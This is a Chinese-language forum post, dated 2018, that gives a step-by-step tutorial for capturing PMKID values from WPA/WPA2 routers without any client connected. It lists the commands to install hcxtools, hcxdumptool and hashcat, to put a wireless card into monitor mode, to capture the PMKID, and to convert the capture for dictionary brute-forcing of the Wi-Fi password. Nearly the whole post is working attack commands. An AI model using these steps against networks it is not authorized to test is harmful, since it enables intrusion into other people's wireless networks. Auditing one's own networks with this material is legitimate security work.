少尉
- 注册时间
- 2016-6-10
- 金币
- 229 个
- 威望
- 1 个
- 荣誉
- 0 个
尚未签到
|
本帖最后由 abc_2017 于 2018-8-27 15:02 编辑
据hashcat研究人员发现........
所有支持漫游路由器, 都无需要有客户端在线 也能实现抓到 "包" pmkID
测试环境最新的Kali
需要安装下面3个
hcxtools v4.2
hcxdumptool 抓取捕获pmkid值
hashcat v4.2 用来跑这种抓取到pmkid数据
安装操作步骤1. 下一步..
apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
git clone https://github.com/ZerBea/hcxtools
cd hcxtools
make
make install
2. 下一步..
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool
make
make install
3. 下一步..
wget https://hashcat.net/files/hashcat-4.2.1.7z
7z x hashcat-4.2.1.7z
4. 下一步..开始抓取路由器pmkID
ifconfig wlan0 down
iwconfig wlan0 mode monitor
iwconfig wlan0 up
hcxdumptool -o test.pcapng -i wlan0 --enable_status=1
由于信道环境噪杂干扰 需等待时间可能需要廷长...
但当返回如下信息数据时,说明成功抓取到PMKID
[FOUND PMKID]
以上在无客户端情况下获取到PMKID成功 (这时相当于抓到路由器含有验证过密码4次握手包)
而且PMKID永远是准确有效性握手, 相比于4路握手包 优点不需要再去分析数据握手是否有效性, 而它是直接有效性
当取得PMKID数据时它直接就是有效的, 无需再分析它
只需要将其pcapng格式转换就可以进行直接字典暴力破解
但目前只有hashcat支持这种格式暴力破解, 不会使用hashcat的 也无须担心 其它跑包软件将也会支持这种格式暴力破解 ( 例如wifipr ewsa )
但现在想要暴力破解它得到唯一的密码,你还需要将pcapng格式转换为hashcat支持的格式
先测试转换为hashcat支持的格式命令如下
hcxpcaptool -z test.16800 test.pcapng
然后开始使用hashcat跑包
补充。。。
另外还发现 .cap格式文件也含有pmkID值(如果路由器支持漫游功能的,抓取到.cap格式也会含有pmkid) |
评分
-
2
查看全部评分
-
|